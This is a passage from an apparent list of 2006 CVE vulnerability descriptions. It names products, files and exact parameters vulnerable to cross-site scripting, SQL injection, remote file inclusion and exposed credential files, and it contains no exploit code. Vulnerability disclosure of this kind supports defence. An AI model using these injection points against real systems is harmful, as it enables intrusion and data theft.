HTML via the image parameter. [CVE-2006-3138] Multiple cross-site scripting (XSS) vulnerabilities in phpMyDirectory 10.4.5 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) PIC parameter in offers-pix.php, (2) from parameter in cp/index.php, and (3) action parameter in cp/admin_index.php. [CVE-2006-3137] Cross-site scripting (XSS) vulnerability in productDetail.asp in Edge eCommerce Shop allows remote attackers to inject arbitrary web script or HTML via the cart_id parameter. [CVE-2006-3136] DISPUTED Multiple PHP remote file inclusion vulnerabilities in Nucleus 3.23 allow remote attackers to execute arbitrary PHP code via a URL the DIR_LIBS parameter in (1) path/action.php, and to files in path/nucleus including (2) media.php, (3) /xmlrpc/server.php, and (4) /xmlrpc/api_metaweblog.inc.php. NOTE: this is a similar vulnerability to CVE-2006-2583. NOTE: this issue has been disputed by third parties, who state that the DIR_LIBS parameter is defined in an include file before being used. [CVE-2006-3135] Multiple SQL injection vulnerabilities in CMS Mundo 1.0 build 008, and possibly other versions, allow remote attackers to execute arbitrary SQL commands via the (1) news_id parameter in the (a) news module, (2) searchstring parameter in (b) the search module, (3) id parameter in (c) the webshop module, (4) username parameter in (d) index.php, and (5) Name, (6) Address, (7) Zip, (8) City, (9) Country, and (10) Email fields during (e) a user profile update. [CVE-2006-3132] Cross-site scripting (XSS) vulnerability in qtofm.php4 in QTOFileManager 1.0 allows remote attackers to inject arbitrary web script or HTML via the msg parameter, as originally reported for index.php. [CVE-2006-3131] Multiple cross-site scripting (XSS) vulnerabilities in Clubpage allow remote attackers to inject arbitrary web script or HTML via the (1) news_archive, (2) language, and (3) intranetLogin parameters in (a) index.php [CVE-2006-3129] Multiple cross-site scripting (XSS) vulnerabilities in index.php in NC LinkList 1.2 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) cat and (2) view parameters. [CVE-2006-3110] Cross-site scripting (XSS) vulnerability in main.php in Chipmailer 1.09 allows remote attackers to inject arbitrary web script or HTML via the (1) name, (2) betreff, (3) mail, and (4) text parameters. [CVE-2006-3109] Cross-site scripting (XSS) vulnerability in Cisco CallManager 3.3 before 3.3(5)SR3, 4.1 before 4.1(3)SR4, 4.2 before 4.2(3), and 4.3 before 4.3(1), allows remote attackers to inject arbitrary web script or HTML via the (1) pattern parameter in ccmadmin/phonelist.asp and (2) arbitrary parameters in ccmuser/logon.asp, aka bugid CSCsb68657. [CVE-2006-3106] Cross-site scripting (XSS) vulnerability in index.php in phpMyDesktop\|Arcade 1.0 allows remote attackers to inject arbitrary web script or HTML via the subsite parameter in the subsite todo. [CVE-2006-3103] Cross-site scripting (XSS) vulnerability in Bitweaver 1.3 allows remote attackers to inject arbitrary web script or HTML via the (1) error parameter in users/login.php and the (2) feedback parameter in articles/index.php. [CVE-2006-3102] Race condition in articles/BitArticle.php in Bitweaver 1.3, when run on Apache with the mod_mime extension, allows remote attackers to execute arbitrary PHP code by uploading arbitrary files with double extensions, which are stored for a small period of time under the webroot in the temp/articles directory. [CVE-2006-3101] Cross-site scripting (XSS) vulnerability in LogonProxy.cgi in Cisco Secure ACS for UNIX 2.3 allows remote attackers to inject arbitrary web script or HTML via the (1) error, (2) SSL, and (3) Ok parameters. [CVE-2006-3095] Multiple cross-site scripting (XSS) vulnerabilities in iPostMX 2005 2.0 and earlier allow remote attackers to inject arbitrary web script or HTML via the RETURNURL parameter in (1) userlogin.cfm and (2) account.cfm. [CVE-2006-3089] Multiple cross-site scripting (XSS) vulnerabilities in PhpMyFactures 1.0, and possibly 1.2 and earlier, allow remote attackers to inject arbitrary web script or HTML via the (1) prefixe_dossier parameter in (a) /inc/header.php [CVE-2006-3088] Cross-site scripting (XSS) vulnerability in index.php in Car Classifieds allows remote attackers to inject arbitrary web script or HTML via the make_id parameter. NOTE: the provenance of this information is unknown [CVE-2006-3087] Multiple cross-site scripting (XSS) vulnerabilities in EZGallery 1.5 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) pUserID, (2) aid, (3) aname, (4) uid, and (5) m parameter in (a) common/galleries.asp [CVE-2006-3080] Cross-site scripting (XSS) vulnerability in viewposts.cfm in aXentForum II and earlier allows remote attackers to inject arbitrary web script or HTML via the startrow parameter. [CVE-2006-3079] Cross-site scripting (XSS) vulnerability in index.cfm in SSPwiz Plus 1.0.7 and earlier allows remote attackers to inject arbitrary web script or HTML via the message parameter. [CVE-2006-3077] Cross-site scripting (XSS) vulnerability in guestbook.cfm in aXentGuestbook 1.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the startrow parameter. [CVE-2006-3073] Multiple cross-site scripting (XSS) vulnerabilities in the WebVPN feature in the Cisco VPN 3000 Series Concentrators and Cisco ASA 5500 Series Adaptive Security Appliances (ASA), when in WebVPN clientless mode, allow remote attackers to inject arbitrary web script or HTML via the domain parameter in (1) dnserror.html and (2) connecterror.html, aka bugid CSCsd81095 (VPN3k) and CSCse48193 (ASA). NOTE: the vendor states that "WebVPN full-network-access mode" is not affected, despite the claims by the original researcher. [CVE-2006-3071] Cross-site scripting (XSS) vulnerability in index.php in MP3 Search/Archive 1.2 allows remote attackers to inject arbitrary web script or HTML via the (1) keywords parameter, as used by the "search box", and (2) res parameter. [CVE-2006-3063] Multiple cross-site scripting (XSS) vulnerabilities in myPHP Guestbook 1.x through 2.0.0-r1 and before 2.0.1 RC5 allow remote attackers to inject arbitrary web script or HTML via the (1) comment, (2) email, (3) homepage, (4) id, (5) name, and (6) text parameters in (a) index.php, the (7) comment, (8) email, (9) homepage, (10) number, (11) name, and (12) text parameters in (b) admin/guestbook.php, and the (13) email, (14) homepage, (15) icq, (16) name, and (17) text parameters in (c) admin/edit.php. [CVE-2006-3062] Cross-site scripting (XSS) vulnerability in index.php in myPHP Guestbook 2.0.4 and earlier allows remote attackers to inject arbitrary web script or HTML via the lang parameter. [CVE-2006-3061] Multiple cross-site scripting (XSS) vulnerabilities in 5 Star Review allow remote attackers to inject arbitrary web script or HTML via the (1) sort parameter in index2.php, (2) item_id parameter in report.php, (3) search_term parameter (aka the "search box") in search_reviews.php, (4) the profile field in usercp/profile_edit1.php, and the (5) review field in review_form.php. [CVE-2006-3060] Cross-site scripting (XSS) vulnerability in P.A.I.D 2.2 allows remote attackers to inject arbitrary web script or HTML via the (1) read parameter in index.php, (2) farea parameter in faq.php, and (3) unspecified input fields on the "My Account" login page. [CVE-2006-3052] Cross-site scripting (XSS) vulnerability in Event Registration allows remote attackers to inject arbitrary web script or HTML via the (1) event_id parameter to view-event-details.php or (2) select_events parameter to event-registration.php. NOTE: the provenance of this information is unknown [CVE-2006-3049] Multiple cross-site scripting (XSS) vulnerabilities in booking3.php in Mole Group Ticket Booking Script allow remote attackers to inject arbitrary web script or HTML via the (1) name, (2) address1, (3) address2, (4) county, (5) postcode, (6) email, (7) phone, or (8) mobile parameters to booking2.php. [CVE-2006-3047] Cross-site scripting (XSS) vulnerability in TikiWiki 1.9.3.2 and possibly earlier versions allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors. [CVE-2006-3044] Cross-site scripting (XSS) vulnerability in LogiSphere 1.6.0 allows remote attackers to inject arbitrary web script or HTML via the URL, which is reflected in an error page. [CVE-2006-3043] Cross-site scripting (XSS) vulnerability in search.cfm in CreaFrameXe (CFXe) CMS 2.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the voltext_suche parameter. [CVE-2006-3039] Cross-site scripting (XSS) vulnerability in index.php in Cescripts Realty Home Rent allows remote attackers to inject arbitrary web script or HTML via the sel_menu parameter. NOTE: the vendor notified CVE on 20060823 that "All issues concerning this script and others at cescripts.com have been addressed and fixed." [CVE-2006-3038] Cross-site scripting (XSS) vulnerability in index.php in Cescripts Realty Room Rent allows remote attackers to inject arbitrary web script or HTML via the sel_menu parameter. NOTE: the vendor notified CVE on 20060823 that "All issues concerning this script and others at cescripts.com have been addressed and fixed." [CVE-2006-3037] Multiple cross-site scripting (XSS) vulnerabilities in publish.php in ST AdManager Lite allow remote attackers to inject arbitrary web script or HTML via the (1) title, (2) description, (3) article, (4) bio, and (5) name parameters. [CVE-2006-3036] Multiple cross-site scripting (XSS) vulnerabilities in 35mmslidegallery 6.0 allow remote attackers to inject arbitrary web script or HTML via the (1) imgdir parameter in (a) index.php, and the (2) w, (3) h, and (4) t parameters in (b) popup.php. [CVE-2006-3035] Multiple cross-site scripting (XSS) vulnerabilities in addwords.php in MyScrapbook 3.1 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) name and (2) comment parameters. NOTE: the provenance of this information is unknown [CVE-2006-3033] Cross-site scripting (XSS) vulnerability in MyScrapbook 3.1 allows remote attackers to inject arbitrary web script or HTML via the input box in singlepage.php when submitting scrapbook pages. [CVE-2006-3032] Multiple cross-site scripting (XSS) vulnerabilities in Xtreme ASP Photo Gallery 1.05 and earlier, and possibly 2.0 (trial), allow remote attackers to inject arbitrary web script or HTML via the (1) catname and (2) total parameters in (a) displaypic.asp, and the (3) catname parameter in (b) displaythumbs.asp. [CVE-2006-3031] Multiple cross-site scripting (XSS) vulnerabilities in index.asp in fipsCMS 4.5 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) w, (2) phcat, (3) dayid, and (4) calw parameters. [CVE-2006-3030] Multiple cross-site scripting (XSS) vulnerabilities in DwZone Shopping Cart 1.1.9 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) ToCategory and (2) FromCategory parameters to (a) ProductDetailsForm.asp and (3) UserName and (4) Password parameters to (b) LogIn/VerifyUserLog.asp. [CVE-2006-3029] Cross-site scripting (XSS) vulnerability in default.asp in ClickTech Clickcart 6.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the cat parameter. [CVE-2006-3027] Multiple SQL injection vulnerabilities in Enthrallwebe ePhotos 2.2 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) CAT_ID parameter in (a) subphotos.asp and (b) subLevel2.asp, the (2) AL_ID parameter in (c) photo.asp, and the (3) SUB_ID parameter in (d) subLevel2.asp. [CVE-2006-3026] Multiple cross-site scripting (XSS) vulnerabilities in ClickGallery 5.0 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) gallery_id parameter in gallery.asp and (2) parentcurrentpage parameter in view_gallery.asp. [CVE-2006-3025] Cross-site scripting (XSS) vulnerability in Cal.PHP3 in Chris Lea Lucid Calendar 0.22 allows remote attackers to inject arbitrary web script or HTML via unspecified parameters. NOTE: the provenance of this information is unknown [CVE-2006-3024] Multiple cross-site scripting (XSS) vulnerabilities in EvGenius Counter 3.4 and earlier allow remote attackers to inject arbitrary web script or HTML via the page parameter in (1) monthly.php and (2) daily.php. [CVE-2006-3023] Multiple cross-site scripting (XSS) vulnerabilities in thumbnails.asp in Uapplication Uphotogallery 1.1 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) s and (2) block parameters. [CVE-2006-3022] Cross-site scripting (XSS) vulnerability in zoom.php in fipsGallery 1.5 and earlier allows remote attackers to inject arbitrary web script or HTML via the path parameter. [CVE-2006-3021] Multiple cross-site scripting (XSS) vulnerabilities in BlueCollar i-Gallery 4.1 PLUS and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) n and (2) d parameters in (a) login.asp and the d parameter in (b) igallery.asp. [CVE-2006-3020] Multiple cross-site scripting (XSS) vulnerabilities in FullPhoto.asp in WS-Album 1.1 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) image and (2) PublisedDate parameters. [CVE-2006-3009] Multiple cross-site scripting (XSS) vulnerabilities in Open Business Management (OBM) 1.0.3 pl1 allow remote attackers to inject arbitrary HTML or web script via the (1) tf_lang, (2) tf_name, (3) tf_user, (4) tf_lastname, (5) tf_contact, (6) tf_datebefore, and (7) tf_dateafter parameters to files such as (a) publication/publication_index.php, (b) group/group_index.php, (c) user/user_index.php, (d) list/list_index.php, and (e) company/company_index.php. [CVE-2006-3007] Multiple cross-site scripting (XSS) vulnerabilities in SHOUTcast 1.9.5 allow remote attackers to inject arbitrary HTML or web script via the DJ fields (1) Description, (2) URL, (3) Genre, (4) AIM, and (5) ICQ. [CVE-2006-3006] Cross-site scripting (XSS) vulnerability in iFoto 0.20, and possibly other versions before 0.50, allows remote attackers to inject arbitrary HTML or web script via a base64-encoded file parameter. [CVE-2006-3004] Multiple cross-site scripting (XSS) vulnerabilities in Ez Ringtone Manager allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter in player.php and (2) keyword parameter when performing a search. [CVE-2006-3002] Cross-site scripting (XSS) vulnerability in details.php in Easy Ad-Manager allows remote attackers to inject arbitrary web script or HTML via the mbid parameter, which is reflected in an error message. NOTE: on 20060829, the vendor notified CVE that this issue has been fixed. [CVE-2006-3001] Cross-site scripting (XSS) vulnerability in search.php in OkScripts OkMall 1.0 allow remote attackers to inject arbitrary web script or HTML via the page parameter. NOTE: this might be resultant from another vulnerability, since the XSS is reflected in an error message. [CVE-2006-3000] Cross-site scripting (XSS) vulnerability in search.php in OkScripts OkArticles 1.0 allows remote attackers to inject arbitrary web script or HTML via the q parameter. [CVE-2006-2999] Cross-site scripting (XSS) vulnerability in search.php in OkScripts QuickLinks 1.1 allows remote attackers to inject arbitrary web script or HTML via the q parameter. [CVE-2006-2997] Cross-site scripting (XSS) vulnerability in ZMS 2.9 and earlier, when register_globals is enabled, allows remote attackers to inject arbitrary web script or HTML via the raw parameter in the search field. [CVE-2006-2995] Multiple PHP remote file inclusion vulnerabilities in WebprojectDB 0.1.3 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the INCDIR parameter in (1) include/nav.php and (2) include/lang.php. [CVE-2006-2994] Multiple cross-site scripting (XSS) vulnerabilities in index.php in phazizGuestbook 2.0 allow remote attackers to inject arbitrary web script or HTML via the (1) name, (2) email, (3) url fields, and (4) text field (content parameter). [CVE-2006-2992] Cross-site scripting (XSS) vulnerability in display.asp in My Photo Scrapbook 1.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the key_m parameter. [CVE-2006-2991] Multiple cross-site scripting (XSS) vulnerabilities in Ringlink 3.2 allow remote attackers to inject arbitrary web script or HTML via a JavaScript URI in the SRC attribute of an IMG element, and possibly other manipulations, in the ringid parameter in (1) next.cgi, (2) stats.cgi, or (3) list.cgi. [CVE-2006-2990] Cross-site scripting (XSS) vulnerability in default.asp in VanillaSoft Helpdesk 2005 and earlier allows remote attackers to inject arbitrary web script or HTML via the username parameter. [CVE-2006-2989] Cross-site scripting (XSS) vulnerability in listpics.asp in ASP ListPics 4.3 and earlier allows remote attackers to inject arbitrary web script or HTML via the info parameter. [CVE-2006-2988] Cross-site scripting (XSS) vulnerability in dictionary.php in Chemical Dictionary allows remote attackers to inject arbitrary web script or HTML via the keyword parameter in a browse action. [CVE-2006-2986] Multiple cross-site scripting (XSS) vulnerabilities in Baby Katie Media (a) very Simple Car Lister (vSCAL) 1.0 and (b) very simple Realty Lister (vsREAL) 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) lid parameter in index.php and the (2) title parameter in myslideshow.php. [CVE-2006-2984] Cross-site scripting (XSS) vulnerability in index.php in IntegraMOD 1.4.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the STYLE_URL parameter. NOTE: it is possible that this issue is resultant from SQL injection. [CVE-2006-2979] Multiple cross-site scripting (XSS) vulnerabilities in ViArt Shop Free 2.5.5, and possibly other distributions including Light, Standard, and Enterprise, allow remote attackers to inject arbitrary web script or HTML via the (1) forum_id parameter in forum.php, which is not properly handled in block_forum_topics.php, and (2) item_id parameter in reviews.php, which is not properly handled in block_reviews.php. [CVE-2006-2975] Multiple cross-site scripting (XSS) vulnerabilities in pblguestbook.php in PBL Guestbook 1.31 allow remote attackers to inject arbitrary web script or HTML via javascript in the SRC attribute of IMG tags in the (1) name, (2) email, and (3) website parameter, which bypasses XSS protection mechanisms that check for SCRIPT tags but not IMG. NOTE: portions of this description's details are obtained from third party information. [CVE-2006-2974] Multiple cross-site scripting (XSS) vulnerabilities in EmailArchitect Email Server 6.1.0.5 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) errCode and (2) uid parameter in (a) default.asp and (3) dname parameter in (b) /admin/dns.asp and (c) /additional/regdomain_done.asp. [CVE-2006-2969] Cross-site scripting (XSS) vulnerability in L0j1k tinyMuw 0.1.0 allow remote attackers to inject arbitrary web script or HTML via a javascript URI in the SRC attribute of an IMG element in the input box in quickchat.php, and possibly other manipulations. [CVE-2006-2968] Cross-site scripting (XSS) vulnerability in search.php in PHP Labware LabWiki 1.0 allows remote attackers to inject arbitrary web script or HTML via the search input box (query parameter). [CVE-2006-2966] Cross-site scripting (XSS) vulnerability in Particle Soft Particle Wiki 1.0.2 allows remote attackers to inject arbitrary web script or HTML via a BR element with an extraneous IMG tag and a STYLE attribute that contains "//" comment sequences, which bypasses the XSS protection scheme. [CVE-2006-2965] Multiple cross-site scripting (XSS) vulnerabilities in Particle Soft Particle Whois 1.0.3 allow remote attackers to inject arbitrary web script or HTML via (1) the target parameter in index.php and (2) the "input box." [CVE-2006-2963] Cross-site scripting (XSS) vulnerability in Suchergebnisse.asp in Cabacos Web CMS 3.8.498 and earlier allows remote attackers to inject arbitrary web script or HTML via the suchtext parameter. [CVE-2006-2957] Cross-site scripting (XSS) vulnerability in i.List 1.5 beta and earlier allows remote attackers to inject arbitrary web script or HTML via the banurl parameter to add.php. NOTE: the provenance of this information is unknown [CVE-2006-2956] Multiple cross-site scripting (XSS) vulnerabilities in i.List 1.5 beta and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) searchword parameter to search.php or (2) siteurl parameter to add.php. [CVE-2006-2955] Multiple cross-site scripting (XSS) vulnerabilities in KAPhotoservice 7.5 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) New Category (newcategory) or (2) apage parameter to (a) edtalbum.asp, or the (3) cat or (4) albumid parameter to (b) album.asp. [CVE-2006-2953] Cross-site scripting (XSS) vulnerability in default.asp in OfficeFlow 2.6 and earlier allows remote attackers to inject arbitrary web script or HTML via the sqlType parameter. [CVE-2006-2951] Multiple cross-site scripting (XSS) vulnerabilities in Net Portal Dynamic System (NPDS) 5.10 and earlier allow remote attackers to inject arbitrary web script and HTML via the (1) Titlesitename or (2) sitename parameter to (a) header.php, (3) nuke_url parameter to (b) meta/meta.php, (4) forum parameter to (c) viewforum.php, (5) post_id, (6) forum, (7) topic, or (8) arbre parameter to (d) editpost.php, or (9) uname or (10) email parameter to (e) user.php. [CVE-2006-2949] Cross-site scripting (XSS) vulnerability in private.php in MyBB 1.1.2 allows remote attackers to inject arbitrary web script or HTML via the do parameter. [CVE-2006-2948] A-CART 2.0 stores the acart2_0.mdb file under the web document root with insufficient access control, which allows remote attackers to obtain username and password information. [CVE-2006-2946] Dmx Forum 2.1a stores _includes/bd.inc under the web root with insufficient access control, which allows remote attackers to obtain database username and password information. [CVE-2006-2943] Unspecified vulnerability in CGI-RESCUE WebFORM 4.1 and earlier allows remote attackers to inject email headers, which facilitates sending spam messages. NOTE: the details for this issue are obtained from third party information. [CVE-2006-2942] TWiki 4.0.0, 4.0.1, and 4.0.2 allows remote attackers to gain Twiki administrator privileges via a TWiki.TWikiRegistration form with a modified action attribute that references the Sandbox web instead of the user web, which can then be used to associate the user's login name with the WikiName of a member of the TWikiAdminGroup. [CVE-2006-2927] Multiple cross-site scripting (XSS) vulnerabilities in post.asp in CodeAvalanche FreeForum (aka CAForum) 1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) msg_subject and (2) msg_body parameters. NOTE: The provenance of this information is unknown [CVE-2006-2924] Ingate Firewall in the SIP module before 4.4.1 and SIParator before 4.4.1, when TLS is enabled or when SSL/TLS is enabled in the web server, allows remote attackers to cause a denial of service (crash) via a crafted SSL/TLS handshake. [CVE-2006-2913] Cross-site scripting (XSS) vulnerability in SelectaPix 1.31 allows remote attackers to inject arbitrary web script or HTML via the albumID parameter to (1) popup.php and (2) view_album.php. [CVE-2006-2903] Cross-site scripting (XSS) vulnerability in admin.php in Particle Links 1.2.2 allows remote attackers to inject arbitrary web script or HTML via the username parameter. [CVE-2006-2901] The web server for D-Link Wireless Access-Point (DWL-2100ap) firmware 2.10na and earlier allows remote attackers to obtain sensitive system information via a request to an arbitrary .cfg file, which returns configuration information including passwords. [CVE-2006-2899] Unspecified vulnerability in ESTsoft InternetDISK versions before 2006/04/20 allows remote authenticated users to execute arbitrary code, possibly by uploading a file with multiple extensions into the WebLink directory. [CVE-2006-2897] Cross-site scripting (XSS) vulnerability in FunkBoard 0.71 allows remote attackers to inject arbitrary HTML or web script via unspecified vectors. [CVE-2006-2895] Cross-site scripting (XSS) vulnerability in MediaWiki 1.6.0 up to versions before 1.6.7 allows remote attackers to inject arbitrary HTML and web script via the edit form. [CVE-2006-2893] index.php in GANTTy 1.0.3 allows remote attackers to obtain the full path of the web server via an invalid lang parameter in an authenticate action. [CVE-2006-2892] Cross-site scripting (XSS) vulnerability in index.php in GANTTy 1.0.3 allows remote attackers to inject arbitrary HTML and web script via the message parameter in a login action. [CVE-2006-2891] Cross-site scripting (XSS) vulnerability in admin/index.php for Pixelpost 1-5rc1-2 and earlier allows remote attackers to inject arbitrary HTML or web script via the loginmessage parameter. [CVE-2006-2885] Multiple cross-site scripting (XSS) vulnerabilities in KnowledgeTree Open Source 3.0.3 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) fDocumentId parameter in view.php and the (2) fSearchableText parameter in /search/simpleSearch.php. [CVE-2006-2883] Cross-site scripting (XSS) vulnerability in search.php in Kmita FAQ 1.0 allows remote attackers to inject arbitrary web script or HTML via the q parameter. [CVE-2006-2882] Multiple cross-site scripting (XSS) vulnerabilities submit.asp in ASPScriptz Guest Book 2.0 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) GBOOK_UNAME, (2) GBOOK_EMAIL, (3) GBOOK_CITY, (4) GBOOK_COU, (5) GBOOK_WWW, and (6) GBOOK_MESS form fields. [CVE-2006-2880] Cross-site scripting (XSS) vulnerability in the Contributed Packages for PyBlosxom 1.2.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the Comments plugin in the (1) url and (2) author fields. [CVE-2006-2876] Cross-site scripting (XSS) vulnerability in cat.php in PHP Pro Publish 2.0 allows remote attackers to inject arbitrary web script or HTML via the catname parameter. NOTE: the provenance of this information is unknown [CVE-2006-2873] Cross-site scripting (XSS) vulnerability in hava.asp in Enigma Haber 4.2 allows remote attackers to inject arbitrary web script or HTML via the il parameter. NOTE: the provenance of this information is unknown [CVE-2006-2870] Cross-site scripting (XSS) vulnerability in forum_search.asp in Intelligent Solutions Inc. ASP Discussion Forum allows remote attackers to inject arbitrary web script or HTML via the search variable. [CVE-2006-2860] PHP remote file inclusion vulnerability in Webspotblogging 3.0.1 allows remote attackers to execute arbitrary PHP code via a URL in the path parameter to (1) inc/logincheck.inc.php, (2) inc/adminheader.inc.php, (3) inc/global.php, or (4) inc/mainheader.inc.php. NOTE: some of these vectors were also reported for 3.0 in a separate disclosure. [CVE-2006-2851] Cross-site scripting (XSS) vulnerability in index.php in dotProject 2.0.2 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified parameters, which are not properly handled when the client is using Internet Explorer. [CVE-2006-2850] Cross-site scripting (XSS) vulnerability in recentchanges.php in PHP Labware LabWiki 1.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the help parameter. [CVE-2006-2849] PHP remote file inclusion vulnerability in includes/webdav/server.php in Bytehoard 2.1 Epsilon/Delta allows remote attackers to execute arbitrary PHP code via a URL in the bhconfig[bhfilepath] parameter. [CVE-2006-2848] links.asp in aspWebLinks 2.0 allows remote attackers to change the administrative password, possibly via a direct request with a modified txtAdministrativePassword field. [CVE-2006-2847] SQL injection vulnerability in links.asp in aspWebLinks 2.0 allows remote attackers to execute arbitrary SQL commands via the linkID parameter. [CVE-2006-2846] Cross-site scripting (XSS) vulnerability in Print.PHP in VisionGate Portal System allows remote attackers to inject arbitrary web script or HTML via unspecified parameters. NOTE: The provenance of this information is unknown [CVE-2006-2840] Cross-site scripting (XSS) vulnerability in (1) uploads.php and (2) "url links" in PmWiki 2.1.6 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified parameters. [CVE-2006-2839] Directory traversal vulnerability in PG Problem Editor module (PGProblemEditor.pm) in WeBWorK Online Homework Delivery System 2.2.0 and earlier allows remote attackers to read and write files outside of the templates directory. [CVE-2006-2838] Buffer overflow in the web console in F-Secure Anti-Virus for Microsoft Exchange 6.40, and Internet Gatekeeper 6.40 through 6.42 and 6.50 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via unknown attack vectors. NOTE: By default, the connections are only allowed from the local host. [CVE-2006-2837] Cross-site scripting (XSS) vulnerability in Techno Dreams Guest Book allows remote attackers to inject arbitrary web script or HTML via certain comment fields in the "Sign Our GuestBook" page, probably the x_Comments parameter to guestbookadd.asp. [CVE-2006-2833] Cross-site scripting (XSS) vulnerability in the taxonomy module in Drupal 4.6.8 and 4.7.2 allows remote attackers to inject arbitrary web script or HTML via inputs that are not properly validated when the page title is output, possibly involving the $names variable. [CVE-2006-2832] Cross-site scripting (XSS) vulnerability in the upload module (upload.module) in Drupal 4.6.x before 4.6.8 and 4.7.x before 4.7.2 allows remote attackers to inject arbitrary web script or HTML via the uploaded filename. [CVE-2006-2830] Buffer overflow in TIBCO Rendezvous before 7.5.1, TIBCO Runtime Agent (TRA) before 5.4, and Hawk before 4.6.1 allows remote attackers to cause a denial of service and possibly execute arbitrary code via the HTTP administrative interface. [CVE-2006-2824] Logicalware MailManager before 2.0.10 does not remove 0xc8 0x27 (0xc8 followed by a single-quote character) from the data stream to the server, which allows remote attackers to modify data and gain administrative access when PostgreSQL is used, aka "bug #1494281 - Postgres encoding security hole." NOTE: while this issue involves PostgreSQL, it is specific to MailManager's interface to PostgreSQL and is therefore a different vulnerability than CVE-2006-2313 and CVE-2006-2314. [CVE-2006-2823] Katrien De Graeve a.shopKart 2.0 (aka ashopKart20) stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for (1) admin/scart.mdb and possibly (2) admin/scart97.mdb. [CVE-2006-2821] Multiple cross-site scripting (XSS) vulnerabilities in DeltaScripts Pro Publish allow remote attackers to inject arbitrary web script or HTML via the (1) artid parameter in art.php and the (2) catname parameter in cat.php. [CVE-2006-2820] Cross-site scripting (XSS) vulnerability in HotWebScripts.com Weblog Oggi 1.0 allows remote attackers to inject arbitrary web script or HTML via a comment, possibly involving a javascript URI in the SRC attribute of an IMG element. [CVE-2006-2816] Multiple cross-site scripting (XSS) vulnerabilities in index.php in coolphp magazine allow remote attackers to inject arbitrary web script or HTML via the (1) op and (2) nick parameters, and possibly the (3) 0000, (4) userinfo, (5) comp_der, (6) encuestas, and (7) pagina parameters. NOTE: it is not clear whether this is a distributable product or a site-specific vulnerability. If it is site-specific, then it should not be included in CVE. [CVE-2006-2815] Multiple cross-site scripting (XSS) vulnerabilities in Two Shoes M-Factory (TSMF) SimpleBoard 1.1.0 Stable (aka com_simpleboard), as used in Mambo and Joomla!, allow remote attackers to inject arbitrary web script or HTML via (1) the Name field in "post ne topic" in the Frontend, (2) the Title (aka Community-Title) field in Simpleboard Configuration in the Backend Admin Panel, and the (3) Name (aka Forum-Title) and (4) Name (aka Category-Title) fields in Simpleboard Administration in the Backend Admin Panel. NOTE: some sources have stated that the sb_authorname parameter is affected, but it is unclear which field is related to it. [CVE-2006-2812] Multiple cross-site scripting (XSS) vulnerabilities in index.php in Dominios Europa PICRATE (aka TAL RateMyPic) 1.0 allow remote attackers to inject arbitrary web script or HTML via a javascript URI in the SRC attribute of an IMG element in the (1) name (aka nick), (2) email, and (3) comment boxes [CVE-2006-2810] Multiple cross-site scripting (XSS) vulnerabilities in Belchior Foundry vCard 2.9 allow remote attackers to inject arbitrary web script or HTML via the page parameter in (1) toprated.php and (2) newcards.php. NOTE: the card_id vector is already covered by CVE-2006-1230. [CVE-2006-2809] Multiple cross-site scripting (XSS) vulnerabilities in index.php in ar-blog 5.2 allow remote attackers to inject arbitrary web script or HTML via the (1) count parameter, and possibly the (2) next, (3) Year_the_news, and (4) mo parameters. NOTE: the year and month vectors are already covered by CVE-2006-0333. [CVE-2006-2808] Cross-site scripting (XSS) vulnerability in Lycos Tripod htmlGEAR guestGEAR (aka Guest Gear) allows remote attackers to inject arbitrary web script or HTML via a guestbook post containing a javascript URI in the SRC attribute of the BR element after an extra "iframe" tagname within that element, followed by a double ">", which might bypass cleansing operations. [CVE-2006-2807] ASPwebSoft Speedy Asp Discussion Forum allows remote attackers to change the password of any account via a modified account id and possibly arbitrary values of the name, email, country, password, and passwordre parameters to profileupdate.asp. [CVE-2006-2804] Cross-site scripting (XSS) vulnerability in index.cfm in Goss Intelligent Content Management (iCM) 7.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the keyword parameter. NOTE: the provenance of this information is unknown [CVE-2006-2803] Multiple cross-site scripting (XSS) vulnerabilities in PHP ManualMaker 1.0 allows remote attackers to inject arbitrary web script or HTML via the (1) id parameter to index.php, (2) search field (possibly the s parameter), or (3) comment field. [CVE-2006-2800] Multiple cross-site scripting (XSS) vulnerabilities in Unak CMS 1.5 RC2 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) u_a or (2) u_s parameters. NOTE: this might be resultant from SQL injection. [CVE-2006-2799] Cross-site scripting (XSS) vulnerability in content_footer.php in toendaCMS 0.7.0 allows remote attackers to inject arbitrary web scripts or HTML via the print_url variable. NOTE: the provenance of this information is unknown [CVE-2006-2798] Multiple cross-site scripting (XSS) vulnerabilities in phpCommunityCalendar 4.0.3 allow remote attackers to inject arbitrary web script or HTML via the (1) LoName parameter in (a) week.php and (b) month.php and (2) AddressLink parameter in (c) event.php. [CVE-2006-2796] Cross-site scripting (XSS) vulnerability in gallery.php in Captivate 1.0 allows remote attackers to inject arbitrary web script or HTML via the page parameter, which is reflected in an 